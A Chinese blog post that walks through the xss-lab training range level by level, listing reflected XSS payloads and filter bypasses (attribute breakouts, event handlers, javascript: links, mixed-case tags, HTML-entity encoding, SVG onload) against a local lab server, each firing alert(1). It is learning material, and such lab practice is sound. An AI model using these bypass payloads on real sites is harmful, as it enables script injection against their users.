XSS漏洞攻击报告

最新推荐文章于 2024-01-07 00:00:59 发布
最新推荐文章于 2024-01-07 00:00:59 发布
阅读量676 收藏 6
点赞数 2
分类专栏: xss 文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vsdfbhsdhsdfh/article/details/126842251
版权

XSS漏洞攻击报告

Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:
    1.反射性XSS;
    2.存储型XSS;
    3.DOMXSS;


XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。
XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致精心构造的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。
因此在XSS漏洞的防范上,一般会采用对输入进行过滤输出进行转义的方式进行处理:
  输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;

  输出转义:根据输出点的位置对输出到前端的内容进行适当转义;

环境

服务器win7:192.168.188.132

攻击机win10:192.168.188.1

这次我们使用xss-lab

第一关

Payload: http://192.168.188.132/xss/level1.php?name=<script>alert(1)</script>

第二关

这次就不行了

我们判断前有”的标记前面加上”>就可以执行了

Payload: http://192.168.188.132/xss/level1.php?name=”><script>alert(1)</script>

第三关

用第二关的payload去试一下

不行

没有当成js来执行

可以使用事件来执行

Payload=‘onmousemove=’javascript:alert(1)’

第四关

在第三关的基础上变成””就行了

Payload = "onclick ='javascript:alert(1)

第五关

发现过滤了

我们可以构造一个新的标签

Pyload="></input><a href='javascript:alert(1)'>asd</a>

第六关

Pyload="></input><a href='javascript:alert(1)'>asd</a>

第七关

发现了过滤

Payload =1"><ScscriptRipt>alert(1)</ScscriptRipt>

第八关

发现了过滤

使用union编码进行一个转义

Payload=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41

第九关

Payload=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://www.baidu.com

显示连接不合法,应该是对url进行判断

第十关

发现了三个input

Payload= &t_sort=" type='text' οnclick='javascript:alert(1)'>//

第11关

这一关要用bp

Payload=

第12关

抓包发现是这个

把user-agent修改

第13关

这次就应该是改cookie

结果

第十四关

有问题

第十五关

是包含外部文件的我们可以使用第一关的代码

第十六关

过滤先是把它小写

Payload =<svg%0Aοnlοad=alert(1)>

vsdfbhsdhsdfh
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS漏洞攻击与防护源代码
10-31
XSS漏洞攻击与防护源代码
信息服务上线渗透检测网络安全检查报告和解决方案4(XSS漏洞修复)
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
09-29 615
它利用网站对用户输入的信任,允许攻击者在目标网站上注入恶意脚本,当用户访问被攻击的页面时,这些脚本会执行,从而盗取用户的敏感信息、破坏用户会话、传播恶意代码等,甚至可以篡改网页的内容,影响用户的浏览体验和数据安全。跨站脚本(XSS攻击是一种常见的网络安全威胁,其中攻击者在目标网站上注入恶意脚本,当用户访问该网站时,这些脚本会被执行,从而导致各种安全问题。请注意,以上提供的方法只是防御XSS攻击的一部分,为了确保应用程序的安全性,应该综合考虑多个安全措施,并进行全面的安全审计和测试。
网络安全———XSS漏洞综述
VN520的博客
02-27 795
XSS(也称为跨站脚本攻击)是一个web安全漏洞,它允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过隔离不同网站的同源策略。跨站点脚本漏洞通常允许攻击者伪装成受害用户,执行用户能够执行的任何操作,并访问用户的任何数据。如果受害用户在应用程序中拥有最高权限,那么攻击者就可能获得对所有应用程序功能和数据的完全控制。
XSS漏洞报告
dongbule的专栏
04-22 454
对于的用户输入搜索出现XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的。现在让我们来普及一下XSS的一些常识,以后在开发的时候,每当有用户输入的内容时,都要加倍小心。 一、什么是XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的htm...
xss跨站脚本攻击的原理、类型、防范
m0_52556798的博客
03-27 972
很久没更新了,这几天都在弄开题报告,完成的还不错 不过这篇xss学习总结比较水,因为有些代码被过滤了,需要完整的学习总结私我就行 什么是xss? 恶意代码嵌入网页中,当客户网文网页的时候,网页中的脚本会自动执行,从而达成黑客攻击的目的。 有些什么类型的xss呢? XSS分类:反射型xss、持久性xss、dom型xss 反射型 非持久化,一般需要欺骗客户去点击构造好的链接才能触发代码 持久型 可以长久的保存在网页中,每个浏览过此网页的用户都会中招, 很多xss蠕虫的爆发都是基于持久型xss,一般在留言板,评论
XSS漏洞及修复方案
热门推荐
若明天不见
07-19 2万+
XSS漏洞介绍、XSS危害及相关修复方案 XSS的原理是WEB应用程序混淆了用户提交的数据和脚本的代码边界,导致浏览器把用户的输入当成了脚本代码来执行。XSS攻击对象是浏览器一端的普通用户。
安全漏洞XSS攻击方法详解
01-26
XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web...
JSP安全开发之XSS漏洞详解
10-21
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户...
奇安信安全扫描漏洞解决路径遍历和存储型xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
XSS漏洞个人总结
weixin_46739058的博客
04-26 2566
初级xss攻击思路,绕过
网络攻防-XSS攻击实验
最新发布
qq_64389397的博客
01-07 1441
1.在传播病毒的同时,将病毒也复制在about me中,这样这段代码就会一直存在,所有访问都在自己的about字段添加这段代码,这样就能一直传第下去。如果不添加If判断,如果时samy自己进入个人简介,也会触发JavaScript代码,但是因为post的about me字段为空,那么这段JavaScript代码将会被清空,所以需要加上这段if判断,这样当当前用户是samy时,不会触发。3.由获取的信息可知,接口的url地址,post提交数据的方式,使用这些信息填入JavaScript框架的对应信息中。
XSS安全漏洞修复解决方案
hold on the last
06-18 2万+
背景:等保测评公司针对我系统进行了一次渗透测试,并发现存在XSS漏洞,现记录修复过程。 框架:SSM。 全站XSS漏洞风险等级:中危 涉及页面:全站存在内容输入处 漏洞描述:所有模块可以修改内容处存在XSS,填入恶意代码后触发。 修复建议:过滤所有输入内容。(防止恶意弹窗/跨站脚本/过滤敏感字符/违法信息等) 解决方案 列举方案1:写个DispatcherServ...
XSS 存储漏洞修复
qq_26244285的博客
01-20 9945
收到检查报告,说是有xss 存储型漏洞,百度看了很多资料总结两句话 1、保存数据库内容需要过滤 2、设置过滤器 思路:我们需要一个过滤前在Controller方法调用前对所有参数进行检查,过滤替换。 过滤》替换非法参数》继续Controller调用。 网上得思路基本是替换,没看到拒绝请求,因为过滤得检查很多很容易被拒绝非常不友好 做法spring拦截器:检查非法内容或特定内容拒绝请求,使用sprintboot得做法很简单,做一个aop切面定义一个定义一个拦截器 import javax..
xss实验并对注入点、注入语句及危害知识总结
五分之一世纪
03-25 1630
<1>xss的概念 xss的英文名字是cross site script。俗称跨站脚本,是一种注入攻击,指攻击者在被攻击的网页上利用编写时的漏洞注入恶意脚本代码,受害者访问该页面时,恶意代码会在用户的浏览器上执行的攻击方式叫做跨域脚本攻击。看xss的名字——“跨域脚本攻击”,思索名字可以发现“跨域”,那么什么是域?跨了什么域?其实这个域是指域名,在web中规定脚本只能在本域名上的不同路径上的文件中执行,而不能在不同域上执行,这个措施的实现就是根据同源策略。下面先用一个实验对xss攻击流程做一个
【实验报告】实验三 XSS和SQL注入
m0_52108440的博客
12-13 1660
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。.
跨站脚本攻击XSS (cross site scripting)--一个小实验
aarong的博客
11-23 2484
进行一个xss跨站脚本攻击,获取目标的IP和Cookie信息。
XSS 漏洞总结
4ct10n
11-03 1万+
xss一直以来接触最少的类型,现在终于有幸将其总结一下了·····,xss漏洞是目前最为常见的漏洞类型之一,其触发脚本经常与js代码有关,所以要想掌握好xss必须要有深厚的js编码功底。本篇内容是我学习xss的总结,会结合着代码编写与实验,对xss进行系统的讲解,以便我更好的认识xss
XSS学习
m0_50830480的博客
09-03 223
XSS漏洞 一、XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export. 二、xss 分类:
WikyBlog XSS漏洞攻击是什么
05-23
XSS(Cross-site scripting)漏洞攻击是一种常见的Web安全漏洞攻击攻击者通过在受害者的网站上注入恶意脚本,使得用户在浏览网站时...因此,XSS漏洞攻击对Web应用程序的安全构成了重大威胁,需要加强相应的防护措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值